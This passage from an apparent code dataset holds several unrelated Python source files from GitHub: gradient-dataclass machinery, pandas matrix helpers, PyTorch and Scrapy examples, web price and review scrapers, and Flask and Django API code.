non-constant field in the flow named \"XXX\". The default `__iadd__`
The default `__iadd__`\n    implementation performs `__iadd__` on each of the fields in `Grad`.\n    \"\"\"\n\n    def __new__(meta, name, bases, class_dict):\n        cls = type.__new__(meta, name, bases, class_dict)\n        cls = dataclasses.dataclass(cls, eq=False)\n\n        # Get the fields for inner class autogeneration.\n        cls_fields = dataclasses.fields(cls)\n        # Keep track of all the fields that can vary.\n        nonconst_fields = []\n        for field in cls_fields:\n            if (\"constant_field\" in field.metadata) and (\n                    field.metadata[\"constant_field\"]):\n                continue\n            nonconst_fields.append(field)\n\n        # Create constant flag class.\n        if \"ConstFlags\" not in cls.__dict__:\n            const_flag_fields = [(field.name, bool,\n                                  dataclasses.field(default=False))\n                                 for field in nonconst_fields]\n            cls.ConstFlags = dataclasses.make_dataclass(name + \".ConstFlags\",\n                                                        const_flag_fields)\n\n            def __bool__(self) -> bool:\n                return all(\n                    getattr(self, field.name) for field in nonconst_fields)\n\n            def set_all(self, value: bool) -> None:\n                for field in nonconst_fields:\n                    setattr(self, field.name, value)\n\n            cls.ConstFlags.__bool__ = __bool__\n            cls.ConstFlags.set_all = set_all\n\n        # Create the gradient class.\n        if \"Grad\" not in cls.__dict__:\n            grad_fields = [(field.name + \"_grad\", field.type, np_zero_field(1))\n                           for field in nonconst_fields]\n\n            grad_bases = tuple(cls_base.Grad for cls_base in bases)\n            cls.Grad = dataclasses.make_dataclass(name + \".Grad\",\n                                                  grad_fields,\n                                                  bases=grad_bases)\n\n            def __iadd__(self, value):\n                for field in grad_fields:\n                    field_val = getattr(self, field[0])\n                    value_val = getattr(value, field[0])\n                    try:\n                        field_val.__iadd__(value_val)\n                    except AttributeError:\n                        setattr(self, field[0], value_val + field_val)\n                return super(cls.Grad, self).__iadd__(value)\n\n            cls.Grad.__iadd__ = __iadd__\n\n        return cls\n\n\ndef np_zero_field(n: int):\n    \"\"\"Creates a field that defaults to a numpy array with zeros.\n\n    Args:\n        n: Number of elements in array.\n\n    Returns:\n        Dataclass field that produces an array with `n` zeros.\n    \"\"\"\n    return dataclasses.field(default_factory=lambda: np.zeros(n))\n\n\ndef constant_field(**kwargs):\n    \"\"\"Marks a flow field as constant.\n\n    Constant flow fields are not permitted to change value once set, and\n    consequently, the gradients for these fields do not exist.\n\n    Args:\n        kwargs: Keyword arguments to pass to `dataclasses.field`.\n\n    Returns:\n        A dataclasses field where `metadata` has entry `\"constant_field\": True`.\n    \"\"\"\n    if \"metadata\" not in kwargs:\n        kwargs[\"metadata\"] = {}\n    kwargs[\"metadata\"].update({\"constant_field\": True})\n    return dataclasses.field(**kwargs)\n\n\nclass Flow(metaclass=FlowMeta):\n\n    class Grad:\n\n        def __iadd__(self, value):\n            return self\n\n    def __eq__(self, other: \"Flow\") -> bool:\n        \"\"\"Checks if two dataclasses are equal to each other.\n\n        We need to implement the equality operator separately to handle NumPy\n        arrays, which require calling `.all()` to indicate equality.\n\n        Args:\n            other: Flow to compare to.\n\n        Returns:\n            `True` only if `self` and `other` are the same type and their\n            values are equal.\n\n        Raises:\n            NotImplementedError: If the flow types are different between `self`\n                and `other`.\n        \"\"\"\n        if self is other:\n            return True\n\n        if self.__class__ != other.__class__:\n            raise NotImplementedError(\n                \"Cannot compare flow types, got {} and {}\".format(self, other))\n\n        for val1, val2 in zip(dataclasses.astuple(self),\n                              dataclasses.astuple(other)):\n\n            if val1 is val2:\n                equal = True\n            elif isinstance(val1, np.ndarray) and isinstance(val2, 
np.ndarray):\n equal = (val1.shape == val2.shape) and (val1 == val2).all()\n else:\n equal = val1 == val2\n if not equal:\n return False\n return True\n\n\nclass NumericFlow(Flow):\n \"\"\"Represents a numeric value.\n\n This flow is implemented here because of its special nature (e.g. all\n variables are numeric flows, gradient calculations start with a numeric\n flow).\n \"\"\"\n array: np.ndarray = 0\n\n @dataclasses.dataclass\n class Grad(Flow.Grad):\n array_grad: np.ndarray = np_zero_field(1)\n\n def __iadd__(self, value):\n self.array_grad += value.array_grad\n return super().__iadd__(value)\n\n def __eq__(self, value) -> bool:\n if type(self) == NumericFlow.Grad:\n if isinstance(value, numbers.Number):\n return np.all(self.array_grad == value)\n elif isinstance(value, np.ndarray):\n return np.all(self.array_grad == value)\n elif type(value) == NumericFlow.Grad:\n return np.all(self.array_grad == value.array_grad)\n return super().__eq__(value)\n\n def __eq__(self, value) -> bool:\n if type(self) == NumericFlow:\n if isinstance(value, numbers.Number):\n return np.all(self.array == value)\n elif isinstance(value, np.ndarray):\n return np.all(self.array == value)\n elif type(value) == NumericFlow:\n return np.all(self.array == value.array)\n return super().__eq__(value)\n","repo_name":"stanfordnqp/spins-b","sub_path":"spins/goos/flows.py","file_name":"flows.py","file_ext":"py","file_size_in_byte":7699,"program_lang":"python","lang":"en","doc_type":"code","stars":246,"dataset":"github-code","pt":"60"} +{"seq_id":"8401901749","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 25 22:06:43 2021\n\n@author: muhittin can\n\"\"\"\n\nimport pickle\nimport numpy as np\nopen_file = open(\"Test_Data_LSTM\", \"rb\")\nTests = pickle.load(open_file)\nopen_file.close()\n\n\nprint(\"In our test, you will try to identify if a song is real or computer generated. 
Listen to each song provided and answer:\")\nprint(\"1 if you think the song is real\")\nprint(\"0 if you think the song is computer generated\")\n\nReal_accuracy = 0\nFake_accuracy = 0\n\nfor i in range(0,100):\n    \n    answer = input(\"Answer for song number \"+str(i+1)+\" : \")\n    \n    if answer == \"1\" and Tests[i][-1] == \"Real\":\n        Real_accuracy = Real_accuracy + 1\n    \n    if answer == \"0\" and Tests[i][-1] == \"Fake\":\n        Fake_accuracy = Fake_accuracy + 1 \n    \n\nprint(\"True answers for Real:\",Real_accuracy)\nprint(\"True answers for Computer generated:\",Fake_accuracy)\n\n","repo_name":"mustafayasar28/Music-Generation-using-LSTM","sub_path":"Evaluation/LSTM-Human-Test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37257139080","text":"lists = []\r\ntotal = 0\r\nuser = \"john\"\r\nnumber = 0\r\naverage = 0\r\n\r\n\r\ndef looper():\r\n    global average\r\n    global number\r\n    global total\r\n    while number >= 0:\r\n        number = int(input(\"Please enter a number\"))\r\n        print(number)\r\n        if number >= 0:\r\n            lists.append(number)\r\n        if lists:\r\n            # recompute from scratch so earlier passes are not double-counted\r\n            total = sum(lists)\r\n            average = total / len(lists)\r\n\r\n\r\nname = input(\"Please enter your name\")\r\nif name == user:\r\n    looper()\r\n    print(\"The average number entered is {}\".format(average))\r\nelse:\r\n    print(\"You are not a verified user.\")\r\n\r\n\r\n\r\n","repo_name":"Nockternal/Burger","sub_path":"intro to programming/Task 13/while.py","file_name":"while.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32012771656","text":"import torch\nimport torch.utils.data as Data\nBATCH_SIZE = 5\ntorch.manual_seed(1)\nx = torch.linspace(-1,1,10)\ny = torch.linspace(-2,2,10)\n\ndata_set = Data.TensorDataset(x,y)# build a dataset from the tensors\nloader = Data.DataLoader(\n    dataset=data_set,  # the dataset\n    batch_size=BATCH_SIZE,  # number of samples per batch\n    shuffle=True,  # shuffle the order\n    num_workers=2,  # load the data with two worker subprocesses\n)\n\ndef show_loader():\n    for epoch in range(3):\n        for step, (batch_x, batch_y) in enumerate(loader):\n            print('Epoch:', epoch, '|step:', step, '|batch_x:', batch_x.data.numpy(), '|batch_y:', batch_y.data.numpy())\n\nif __name__ == '__main__':\n    show_loader()","repo_name":"Unrivaled2/RLcode","sub_path":"venv/DataLoader.py","file_name":"DataLoader.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"73969109310","text":"import pkg_resources\n\ntry:\n    pkg_resources.get_distribution('numpy')\nexcept pkg_resources.DistributionNotFound:\n    numpyPresent = False\n    print(\"Error: Numpy package not available.\")\nelse:\n    numpyPresent = True\n    import numpy as np\n\n\ntry:\n    pkg_resources.get_distribution('pandas')\nexcept pkg_resources.DistributionNotFound:\n    pandasPresent = False\n    print(\"Error: Pandas package not available.\")\nelse:\n    pandasPresent = True\n    import pandas as pd\n\nimport collections\nimport inspect\n\n\ndef phjRemoveUnwantedRows(phjDF,\n                          phjColumnNamesList,\n                          phjPrintResults = False):\n    \n    # Remove any rows with one or more NaN values\n    phjNumberRowsPreNaN = len(phjDF.index)\n    \n    phjDF = phjDF.dropna(how = 'any').reset_index(drop = True)\n    \n    phjNumberRowsPostNaN = len(phjDF.index)\n    \n    if phjPrintResults == True:\n        print('Number of rows removed with NaN values = ', phjNumberRowsPreNaN - phjNumberRowsPostNaN)\n        print('\\n')\n        print('Dataframe with NaN values removed')\n        print(phjDF)\n        print('\\n')\n    \n    \n    # Convert each column to numeric values - strings will be converted to NaN and removed\n
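    # (Illustrative: a cell containing the string 'abc' is coerced to NaN\n    # below and its whole row is then dropped.)\n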
    phjNumberRowsPreStrings = len(phjDF.index)\n    \n    for c in phjColumnNamesList:\n        phjDF[c] = pd.to_numeric(phjDF[c],errors = 'coerce')\n    \n    phjDF = phjDF.dropna(how = 'any').reset_index(drop = True)\n    \n    phjNumberRowsPostStrings = len(phjDF.index)\n    \n    if phjPrintResults == True:\n        print('Number of rows removed due to containing string values = ', phjNumberRowsPreStrings - phjNumberRowsPostStrings)\n        print('\\n')\n        print('Dataframe with string values removed')\n        print(phjDF)\n        print('\\n')\n\n\n    # Convert all columns to integers\n    for c in phjColumnNamesList:\n        phjDF[c] = phjDF[c].astype(int)\n    \n    \n    # Remove rows that contain values that are not zero or 1\n    phjNumberRowsPreBinaryRange = len(phjDF.index)\n    \n    for c in phjColumnNamesList:\n        phjDF['isin'] = phjDF[c].isin([0,1])\n        phjDF = phjDF.loc[phjDF['isin'] == True,:]\n    \n    phjDF = phjDF.drop('isin', axis = 1).reset_index(drop = True)\n    \n    phjNumberRowsPostBinaryRange = len(phjDF.index)\n\n    if phjPrintResults == True:\n        print('Number of rows removed due to values being out of range = ', phjNumberRowsPreBinaryRange - phjNumberRowsPostBinaryRange)\n        print('\\n')\n        print('Dataframe containing zero and 1 values only')\n        print(phjDF)\n        print('\\n')\n    \n    \n    return phjDF[phjColumnNamesList].reset_index(drop = True)\n\n\n\ndef phjBinaryVarsToSquareMatrix(phjDataDF,\n                                phjColumnNamesList,\n                                phjOutputFormat = 'arr',\n                                phjPrintResults = False):\n    \n    try:\n        phjDF = phjDataDF[phjColumnNamesList]\n    \n    except KeyError as e:\n        print('A KeyError has occurred ({0}). Check that the column names provided exist in the dataframe.'.format(e))\n        return None\n    \n    phjNumberRowsOriginal = len(phjDF.index)\n    \n    if phjPrintResults == True:\n        print('Number of rows in original database = ', phjNumberRowsOriginal)\n        print('\\n')\n        print('Original dataframe')\n        print(phjDF)\n        print('\\n')\n    \n    # Remove rows where any values are missing, strings, or not a zero or 1\n    phjDF = phjRemoveUnwantedRows(phjDF = phjDF,\n                                  phjColumnNamesList = phjColumnNamesList,\n                                  phjPrintResults = phjPrintResults)\n    \n    \n    phjDF['rowSum'] = phjDF[phjColumnNamesList].sum(axis=1)\n    \n    # Create a blank square matrix (in dataframe form) with column and row indices the same\n    phjTempMatrixDF = pd.DataFrame(columns=phjColumnNamesList,index=phjColumnNamesList)\n    \n    # Start by completing the diagonal\n    # ================================\n    # Use just those rows with only a single entry (i.e. only one variable is entered).\n    # Create a series containing the name of the variable and the sum of entries.\n    # (For some reason, if the dataframe contains one or more rows where rowSum equals 1 then\n    # the series contains integers but, if there are no rowSum values equal to 1 (and, therefore,\n    # the column sums equal zero), then the series contains floats. Use astype(int) to avoid issues.)\n
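    # (Illustrative, made-up data: with columns a and b and the two rows\n    # [1,0] and [1,1], the diagonal becomes a=1 and b=0 from the single-entry\n    # row, and each off-diagonal cell gets 1 from the shared row, giving the\n    # matrix [[1,1],[1,0]].)\n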
    phjTempSer = phjDF.loc[phjDF['rowSum']==1,phjColumnNamesList].sum(axis=0).astype(int)\n    \n    # Step through each diagonal cell in the matrix and enter the sum value\n    for c in phjColumnNamesList:\n        phjTempMatrixDF.loc[c,c]=phjTempSer[c]\n    \n    # Next fill in the rest of the matrix\n    # ===================================\n    # Step through each variable in the list and create a series consisting\n    # of all OTHER variables and the number of entries for those variables\n    for c in phjColumnNamesList:\n        phjOtherCols = [i for i in phjColumnNamesList if i!=c]\n        phjTempSer = phjDF.loc[(phjDF['rowSum']>1) & (phjDF[c]==1),phjOtherCols].sum(axis=0).astype(int)\n        \n        # For each row index, step through each column and add the data\n        for oc in phjOtherCols:\n            phjTempMatrixDF.loc[c,oc] = phjTempSer[oc]\n    \n    if phjPrintResults == True:\n        print('Square matrix')\n        print(phjTempMatrixDF)\n        print('\\n')\n    \n    if phjOutputFormat == 'arr':\n        return phjTempMatrixDF.values\n    \n    elif phjOutputFormat == 'df':\n        return phjTempMatrixDF\n    \n    else:\n        print('The phjOutputFormat parameter was set to an unknown value (\\'{0}\\'). The return value was set to None.'.format(phjOutputFormat))\n        print('\\n')\n        return None\n\n\n\ndef phjLongToWideBinary(phjDF,\n                        phjGroupbyVarName,\n                        phjVariablesVarName,\n                        phjValuesDict = {0:0,1:1},\n                        phjPrintResults = False):\n    # This function takes a dataframe containing a grouping variable and a variable\n    # listing factors that may or may not be present, and converts it to a\n    # wide dataframe containing a series of binary variables that indicate whether\n    # each factor is present or not.\n    # For example, it converts:\n    #\n    #      X  Y\n    #   0  1  a\n    #   1  1  b\n    #   2  1  d\n    #   3  2  b\n    #   4  2  c\n    #   5  3  d\n    #   6  3  e\n    #   7  3  a\n    #   8  3  f\n    #   9  4  b\n    # \n    # to:\n    #      X  a  b  d  c  e  f\n    #   0  1  1  1  1  0  0  0\n    #   1  2  0  1  0  1  0  0\n    #   2  3  1  0  1  0  1  1\n    #   3  4  0  1  0  0  0  0\n    \n    \n    # Check function parameters are set correctly\n    try:\n        # Check whether required parameters have been set to correct type\n        assert isinstance(phjDF,pd.DataFrame), \"Parameter, 'phjDF' needs to be a Pandas dataframe.\"\n        assert isinstance(phjGroupbyVarName,str), \"Parameter 'phjGroupbyVarName' needs to be a string.\"\n        assert isinstance(phjVariablesVarName,str), \"Parameter 'phjVariablesVarName' needs to be a string.\"\n        assert isinstance(phjValuesDict,collections.abc.Mapping), \"Parameter 'phjValuesDict' needs to be a dict.\" # collections.abc.Mapping will work for dict(), collections.OrderedDict() and collections.UserDict() (see comment by Alexander Ryzhov at https://stackoverflow.com/questions/25231989/how-to-check-if-a-variable-is-a-dictionary-in-python.\n        \n        # Check whether arguments are set to allowable values\n        for k,v in phjValuesDict.items():\n            assert k in [0,1], \"The key values in phjValuesDict need to be either 0 or 1.\"\n        \n        assert isinstance(phjPrintResults,bool), \"Parameter 'phjPrintResults' needs to be a boolean (True, False) value.\"\n        \n        # Check that referenced columns exist in the dataframe\n        assert phjGroupbyVarName in phjDF.columns, \"The column name 'phjGroupbyVarName' does not exist in dataframe.\"\n        assert phjVariablesVarName in phjDF.columns, \"The column name 'phjVariablesVarName' does not exist in dataframe.\"\n    \n    except AssertionError as e:\n        # Set return value to none\n        phjScratchDF = None\n        \n        # If function has been called directly, present message.\n
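        # (At module level the calling frame's function name,\n        # inspect.stack()[1][3], is '<module>', which distinguishes a direct\n        # call from a call made inside another function.)\n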
        if inspect.stack()[1][3] == '<module>':\n            print(\"An AssertionError occurred in {fname}() function. ({msg})\\n\".format(msg = e,\n                                                                                   fname = inspect.stack()[0][3]))\n        \n        # If function has been called by another function then modify message and re-raise exception\n        else:\n            print(\"An AssertionError occurred in {fname}() function when called by {callfname}() function. ({msg})\\n\".format(msg = e,\n                                                                                                                             fname = inspect.stack()[0][3],\n                                                                                                                             callfname = inspect.stack()[1][3]))\n            raise\n    \n    else:\n        # Create a scratch DF with appropriate rows and columns, filled with zero\n        phjScratchDF = pd.DataFrame(index = pd.Series(phjDF[phjGroupbyVarName].unique()),\n                                    columns = list(phjDF[phjVariablesVarName].unique())).fillna(0)\n\n        phjScratchDF.index.name = phjGroupbyVarName\n\n        # Within each group, create a list containing all variables\n        phjGroup = phjDF[[phjGroupbyVarName,phjVariablesVarName]].groupby(phjGroupbyVarName).agg(lambda phjRow: list(phjRow))\n\n        # Step through each group and set each variable contained in the list of present variables to 1\n        for g in phjGroup.index.values.tolist():\n            phjScratchDF.loc[g,phjGroup.loc[g,phjVariablesVarName]] = 1\n        \n        # This step replaces the default 0 and 1 with user-defined values. It should only be\n        # run if phjValuesDict has been set to something other than default. Check whether\n        # a passed dict is the same as the default (even if the order of elements has changed).\n        # If simply comparing one dict with another then {0:0,1:1} will be seen to be the\n        # same as {0:False,1:True}. But for the purposes of this exercise, those 2 dicts should\n        # be seen to be different. Therefore, convert the values in both dicts to strings\n        # before comparing.\n        if {k:str(v) for k,v in phjValuesDict.items()} != {k:str(v) for k,v in {0:0,1:1}.items()}:\n            phjScratchDF = phjScratchDF.replace(phjValuesDict)\n        \n        phjScratchDF = phjScratchDF.reset_index(drop = False)\n    \n    finally:\n        # Return phjScratchDF which will be a dataframe if successful or None if not\n        return phjScratchDF\n\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"lvphj/epydemiology","sub_path":"epydemiology/phjMatrices.py","file_name":"phjMatrices.py","file_ext":"py","file_size_in_byte":10918,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"60"} +{"seq_id":"9700900126","text":"import urllib.request\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport sys\r\n\r\nurl = input(\"url: \")\r\n\r\ntry:\r\n    r = requests.get(url) # send the request\r\n    httpHeaders = r.status_code # http status code\r\nexcept Exception as e:\r\n    print('Failed url')\r\n    sys.exit(0)\r\n\r\nif httpHeaders == 200:\r\n\r\n    request = urllib.request.Request(url)  # build a request to the url\r\n    response = urllib.request.urlopen(request)  # get the response\r\n    the_page = response.read()  # read the page\r\n    theText = the_page.decode('utf-8')  # decode the received page as utf-8\r\n\r\n    soup = BeautifulSoup(theText, 'html.parser')\r\n\r\n    for i in soup.find_all('span', {\"data-bind\": \"markupText:'currentPriceBeforePoint'\"}):\r\n        for j in soup.find_all('span', {\"data-bind\": \"markupText:'currentPriceAfterPoint'\"}):\r\n            # e.g. before-point \"129\" and after-point \"99\" print \"Result: 129,99 TL\"\r\n            print(\"Result:\", i.text + ',' + j.text, \"TL\")\r\n\r\nelse:\r\n    print('Failed url')\r\n\r\n\r\n\r\n","repo_name":"behlulboluk/Hepsiburada-Scraper","sub_path":"Script.py","file_name":"Script.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1701854187","text":"from scrapy.spiders import CrawlSpider\nfrom scrapy.http import Request\nfrom selenium import webdriver\nimport 
os\nfrom scrapy.selector import Selector\nimport time\nimport taobaospider.tool as tool\nimport json\nimport re\nimport urllib.request\nimport pandas as pd\n\ndef get_data(driver):\n    user_id = Selector(text=driver.page_source).xpath(u'//div[@class=\"shop\"]/a/@data-userid').extract()\n    data_nid = Selector(text=driver.page_source).xpath(u'//div[@class=\"shop\"]/a/@data-nid').extract()\n    data=list(zip(user_id,data_nid))\n    return data\n\n\nclass Spiders(CrawlSpider):\n    name='taobaospider'\n    allowed_domains=['tmall.com']\n    '''\n    chrome_driver = os.path.abspath(r\"C:/Program Files (x86)/Google/Chrome/Application/chromedriver.exe\")\n    os.environ[\"webdriver.chrome.driver\"] = chrome_driver\n    driver=webdriver.Chrome(chrome_driver)\n    driver.maximize_window()\n    url='https://s.taobao.com/search?q=%E4%BC%91%E9%97%B2%E5%A4%B9%E5%85%8B%E7%94%B7&imgfile=&js=1&stats_click=search_radio_all%3A1&initiative_id=staobaoz_20170410&ie=utf8'\n    driver.get(url)\n    ID=[]\n    for i in range(99):\n        for id in get_data(driver):\n            data='%s,%s' %(id[0],id[1])\n            ID.append(data)\n            tool.GetFile('shop_id',data,3,50000)\n        driver.find_element_by_xpath('//*[@id=\"mainsrp-pager\"]/div/div/div/ul/li[last()]/a').click()\n        time.sleep(20)\n    '''\n    '''\n    start_urls=[]\n    with open('C:/Users/Administrator/Desktop/taobao/休闲男装/taobao_shop_id_0.txt','r',encoding='utf-8') as f:\n        for line in f:\n            start_urls.append(line.strip().replace('\\n',''))\n    ID=set(start_urls)\n    '''\n    #'''\n    # start_urls=['https://rate.tmall.com/list_detail_rate.htm?itemId=10496300260&sellerId=707199638&currentPage=1&tagId=620']\n    #start_urls = ['707199638,10496300260,620']\n    #ID = set(start_urls)\n    start_urls = []\n    with open('C:/Users/Administrator/Desktop/taobao/休闲男装/taobao_tags_0.txt', 'r', encoding='utf-8') as f:\n        for line in f:\n            temp=[]\n            temp.append(line.split('[}')[0])\n            temp.append(line.split('[}')[1])\n            temp.append(line.split('[}')[2])\n            temp.append(line.split('[}')[-1])\n            start_urls.append(','.join(temp))\n    ID = set(start_urls)\n    #'''\n    def start_requests(self):\n        while self.ID.__len__():\n            id=self.ID.pop()\n            seller_id=id.split(',')[0]\n            item_id=id.split(',')[1]\n            tag_id = id.split(',')[2]\n            mark = id.split(',')[-1]\n            content_url = 'http://rate.tmall.com/list_detail_rate.htm?itemId=%s&sellerId=%s&currentPage=1&tagId=%s' % ( item_id, seller_id, tag_id)\n            yield Request(url=content_url,meta={'parameter': id},dont_filter=True,callback=self.parse1)# without dont_filter the request would be filtered out: the redirect goes back to the original url, which scrapy treats as a duplicate\n            #tags_url = 'https://rate.tmall.com/listTagClouds.htm?itemId=%s&isAll=true&isInner=true' % item_id\n            #yield Request(url=tags_url,meta={'ID':id} ,callback=self.parse_0)\n\n\n    def parse_0(self, response):\n        id = response.meta['ID']\n        seller_id = id.split(',')[0]\n        item_id = id.split(',')[1]\n        mydata = response.body_as_unicode()\n        myjson = re.findall('\\\"tagClouds\\\":(.*?),\\\"userTagCloudList\\\"', mydata)[0]\n        for i in json.loads(myjson):\n            tagid=i['id']\n            count=i['count']\n            tag=i['tag']\n            posi=i['posi']\n            data='%s[}%s[}%s[}%s[}%s[}%s' %(seller_id,item_id,tagid,count,tag,posi)\n            print(data)\n            tool.GetFile('tags',data,3,10000)\n            #content_url = 'http://rate.tmall.com/list_detail_rate.htm?itemId=%s&sellerId=%s&currentPage=1&tagId=%s' % (item_id, seller_id, tagid)\n            #parameter = id + ',%s' % tagid\n            meta = {\n                # 'dont_redirect': True,  # forbid page redirects\n                # 'handle_httpstatus_list': [301, 302],  # which abnormal status codes to handle\n            }\n            #yield Request(url=content_url,meta={'parameter': parameter},dont_filter=True,callback=self.parse)\n\n\n    def parse1(self, response):\n
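        # The reply is JSON-like text: read the paginator block first to get\n        # the current and last page numbers, then the list of rate entries.\n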
        mydata=response.body_as_unicode()\n        try:\n            mypage = re.findall('\\\"paginator\\\":(.*?),\\\"rateCount\\\"', mydata)[0]\n            page=json.loads(mypage)['page']\n            last_page=json.loads(mypage)['lastPage']\n            myjson = re.findall('\\\"rateList\\\":(.*?),\\\"searchinfo\\\"',mydata)[0]\n        except Exception:\n            print(response.url)\n            # the expected blocks are missing, so stop parsing this response\n            return\n\n        for i in json.loads(myjson):\n            id=i['id']\n            usernick = i['displayUserNick']\n            sku = i['auctionSku']\n            ratecontent = i['rateContent']\n            tags=re.findall('(.*?)',ratecontent)\n            ratedate = i['rateDate']\n            parameter = response.meta['parameter']\n            seller_id = parameter.split(',')[0]\n            item_id = parameter.split(',')[1]\n            tag_id=parameter.split(',')[2]\n            mark=parameter.split(',')[-1]\n            data = '%s[}%s[}%s[}%s[}%s[}%s[}%s[}%s[}%s[}%s' %(seller_id,item_id,tag_id,id,usernick,sku,ratecontent.replace('','').replace('',''),','.join(tags),mark.replace('\\n',''),ratedate)\n            #print(data)\n            tool.GetFile('user_content', data, 3, 10000)\n        if page!=last_page:\n            content_url = 'http://rate.tmall.com/list_detail_rate.htm?itemId=%s&sellerId=%s&currentPage=%d&tagId=%s' % (item_id, seller_id, int(page)+1,tag_id)\n            #print(content_url)\n            yield Request(url=content_url,meta={'parameter':parameter},dont_filter=True,callback=self.parse1)","repo_name":"he305461055/taobaospiders","sub_path":"taobaospider/spiders/taobaospider.py","file_name":"taobaospider.py","file_ext":"py","file_size_in_byte":5715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5180156069","text":"from flask import request\nfrom flask_restx import Resource\n\nfrom ..util.dto import NetworkDto\nfrom app.main.service.network_service import save_new_network, get_all_networks, get_a_network, delete_a_network, save_update\nfrom typing import Dict, Tuple\n\napi = NetworkDto.api\n_network = NetworkDto.network\n\n@api.route('/')\nclass NetworkList(Resource):\n    @api.doc('list_of_networks')\n    @api.marshal_list_with(_network, envelope='data')\n    def get(self):\n        return get_all_networks()\n\n    @api.expect(_network, validate=True)\n    @api.response(201, 'Network successfully created.')\n    @api.doc('create a new network')\n    def post(self) -> Tuple[Dict[str, str], int]:\n        data = request.json\n        return save_new_network(data=data)\n\n\n@api.route('/<id>')\n@api.param('id', 'The Network identifier')\n@api.response(404, 'Network not found.')\nclass Network(Resource):\n    @api.doc('get a network')\n    @api.marshal_with(_network)\n    def get(self, id):\n        network = get_a_network(id)\n        if not network:\n            api.abort(404, 'Network not found.')\n        else:\n            return network\n\n    @api.doc('delete a network')\n    def delete(self, id):\n        network = get_a_network(id)\n        if not network:\n            api.abort(404, 'Network not found.')\n        else:\n            delete_a_network(network)\n            return ({\n                'status': 'success',\n                'message': 'Successfully deleted network.'\n            }, 200)\n\n    @api.expect(_network, validate=True)\n    @api.response(201, 'Network successfully updated.')\n    @api.doc('update a network')\n    def post(self, id) -> Tuple[Dict[str, str], int]:\n        data = request.json\n        return save_update(id, data=data)","repo_name":"Cragady/hire-career-path","sub_path":"server/app/main/controller/network_controller.py","file_name":"network_controller.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"75031241789","text":"''' Company operations '''\n\n# Django Rest Framework\nfrom rest_framework import status, mixins, viewsets\nfrom rest_framework.response import Response\n\n# Models\nfrom companies.models import Company\n\n# Serializer\nfrom companies.serializers import CompanySerializer\n\n\nclass CompanyViewSet(mixins.CreateModelMixin,\n                     mixins.UpdateModelMixin,\n                     mixins.RetrieveModelMixin,\n                     mixins.DestroyModelMixin,\n                     mixins.ListModelMixin,\n                     viewsets.GenericViewSet):\n\n    queryset = Company.objects.all()\n    serializer_class = CompanySerializer\n\n    def convert_str_to_list(self,data):\n        ''' Convert the array of numbers saved in the database to a list for the response '''\n
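        # (Illustrative: the loop below walks the stored string character by\n        # character, so a value saved as \"123\" comes back as [1, 2, 3];\n        # non-digit characters such as separators are skipped.)\n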
        new_list = []\n        for num in data.values:\n            try:\n                new_list.append(int(num))\n            except (TypeError, ValueError):\n                pass\n\n        return new_list\n\n    def list(self, request, *args, **kwargs):\n        ''' List all the companies with pagination '''\n\n        queryset = Company.objects.all()\n        for q in queryset:\n            q.values = self.convert_str_to_list(q)\n\n        page = self.paginate_queryset(queryset)\n        if page is not None:\n            serializer = self.get_serializer(page, many=True)\n            return self.get_paginated_response(serializer.data)\n\n        serializer = CompanySerializer(queryset, many=True)\n        return Response(serializer.data)\n\n    def retrieve(self, request, *args, **kwargs):\n        ''' Show a company's data '''\n\n        instance = self.get_object()\n        instance.values = self.convert_str_to_list(instance)\n        serializer = self.get_serializer(instance)\n        return Response(serializer.data)\n\n    def create(self, request, *args, **kwargs):\n        ''' Receive the data, validate it and create a new company '''\n\n        serializer = self.get_serializer(data=request.data)\n        serializer.is_valid(raise_exception=True)\n        self.perform_create(serializer)\n        headers = self.get_success_headers(serializer.validated_data)\n        return Response(serializer.validated_data, status=status.HTTP_201_CREATED, headers=headers)\n\n\n    def update(self, request, *args, **kwargs):\n        ''' Handle update and partial update for a model instance '''\n        partial = kwargs.pop('partial', False)\n        instance = self.get_object()\n        instance.values = self.convert_str_to_list(instance)\n        serializer = self.get_serializer(instance, data=request.data, partial=partial)\n        serializer.is_valid(raise_exception=True)\n        self.perform_update(serializer)\n\n        if getattr(instance, '_prefetched_objects_cache', None):\n            # If 'prefetch_related' has been applied to a queryset, we need to\n            # forcibly invalidate the prefetch cache on the instance.\n            instance._prefetched_objects_cache = {}\n\n        return Response(serializer.data)","repo_name":"LaloRivero/django_api_test","sub_path":"companies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10215680138","text":"from django import forms\nfrom ckeditor_uploader.fields import RichTextUploadingField\nfrom django.core.exceptions import ValidationError\nfrom django.forms import ModelForm, BooleanField, CharField, Form, Textarea, TextInput\n\nfrom .models import Post, Comment\n\n\nclass PostForm(forms.ModelForm):\n    def __init__(self, *args, **kwargs):\n        super(PostForm, self).__init__(*args, **kwargs)\n        # self.fields['cat'] = forms.ModelChoiceField(label='Post', empty_label='ghj')\n\n    class Meta:\n        model = Post\n        fields = ('title', 'cat', 'content', 'image',)\n        widgets = {'title': forms.TextInput(attrs={'size': '80'}),\n                   'image': forms.FileInput(attrs={'size': '40'}),\n                   }\n\n\nclass CommentForm(forms.ModelForm):\n    class Meta:\n        model = Comment\n        fields = ('text',)\n\n    def __init__(self, *args, **kwargs):\n        super(CommentForm, self).__init__(*args, **kwargs)\n        self.fields['text'].label = 'Comment'\n\n\nclass 
